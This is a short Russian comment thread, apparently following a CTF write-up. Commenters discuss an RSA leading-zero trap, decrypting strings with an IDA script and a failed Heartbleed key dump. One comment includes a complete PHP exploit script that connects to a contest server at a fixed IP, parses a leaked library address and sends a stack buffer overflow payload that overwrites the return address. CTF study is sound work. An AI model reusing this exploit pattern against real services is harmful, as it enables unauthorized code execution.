Pull to refresh

Comments 3

Вот это у меня был провал с RSA, сразу было видно что это процесс подписи RSA, особенно в dex-ассемблере.
Но я упорно вбивал 25e6f77c39943f83d1d2f8770a1a79, а не 025e6f77c39943f83d1d2f8770a1a79.
Ужас.

raSSLedovanie, имхо, было проще расковырять. Насколько я помню, строки там шифровались, но как-то тупо, и простой IDA script в 5 строчек всё показывал.

Еще жаль что не дожал SSL-дамп. HeartBleed очевиден был, но вот какой-то левый Pyhton-скрипт не смог мне сдампить private key, хотя и обещал. Metasplot'а не стояло.
Кстати, скрипт для «Дружба и братство» на PHP:
PHP говнокод!
<?php

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$result = socket_connect($socket, '79.175.2.85', 8080);

$out = '';

function read($socket)
{
    $step = 0;
    $buf = '';
    while ($out = socket_read($socket, 2048))
    {
        $buf .= $out;
        echo $out;
        if (strpos($buf, 'password') !== false)
        {
            if ($step == 0)
            {
                $in = str_repeat(1, 30) . "\n";
                $step++;
            } elseif ($step == 1)
            {
                preg_match('/\/home\/srv\/libtest.so\(StartTest\+0xd0\) \[0x([a-zA-Z0-9]+)\]/', $buf, $matches);
                $address = $matches[1];
                echo "Address: $address\n";

                // 7eff4c9d4dd4
                $newAddress = '0000' . substr($address, 0, strlen($address) - 3) . 'bf5';
                echo "New address: $newAddress\n";

                // 32 buffer + 8 byte rbp + new return
                $in = str_repeat(1, 40) . strrev(pack('H*', $newAddress)) . "\n";
                $step++;
            } elseif ($step == 2)
            {
                $in = str_repeat(1, 30) . "\n";
                $step++;
            } else
                $in = str_repeat(1, 14) . "\n";
            echo "Send $in";
            socket_write($socket, $in, strlen($in));
            $buf = '';
        }
    }
    return $buf;
}

read($socket);

socket_close($socket);

Да, в ловушку с ноликом в RSA многие попались! :)
Sign up to leave a comment.